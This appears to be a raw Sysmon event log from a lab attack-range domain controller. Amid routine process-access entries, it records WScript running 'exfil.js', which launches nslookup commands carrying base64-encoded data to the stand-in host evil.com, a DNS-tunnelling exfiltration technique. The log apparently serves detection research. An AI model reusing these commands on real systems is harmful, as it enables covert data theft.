14:16:32.932{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.932{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.932{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.932{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.932{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-A140-000000005F02}5440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.932{2E1864BB-17A1-629A-783D-000000005F02}55522384C:\Windows\System32\WScript.exe{2E1864BB-17C0-629A-A140-000000005F02}5440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.944{2E1864BB-17C0-629A-A140-000000005F02}5440C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnhpg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.932{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgcvrq.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.895{2E1864BB-17C0-629A-9F40-000000005F02}73643568C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-A040-000000005F02}7788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.895{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.895{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.879{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.879{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.879{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-A040-000000005F02}7788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.879{2E1864BB-17C0-629A-9E40-000000005F02}27364060C:\Windows\system32\cmd.exe{2E1864BB-17C0-629A-A040-000000005F02}7788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.891{2E1864BB-17C0-629A-A040-000000005F02}7788C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C0-629A-9E40-000000005F02}2736C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgcvrq.tmp 2>&1 10341000x8000000000000000200875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.864{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9F40-000000005F02}7364C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.864{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9F40-000000005F02}7364C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.864{2E1864BB-17C0-629A-9F40-000000005F02}73643568C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-9E40-000000005F02}2736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.848{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9F40-000000005F02}7364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.832{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.832{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.832{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.832{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.832{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9E40-000000005F02}2736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.832{2E1864BB-17A1-629A-783D-000000005F02}55525176C:\Windows\System32\WScript.exe{2E1864BB-17C0-629A-9E40-000000005F02}2736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.842{2E1864BB-17C0-629A-9E40-000000005F02}2736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgcvrq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.832{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcpeq.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.816{2E1864BB-17C0-629A-9C40-000000005F02}24042604C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-9D40-000000005F02}3964C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.795{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.795{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Wind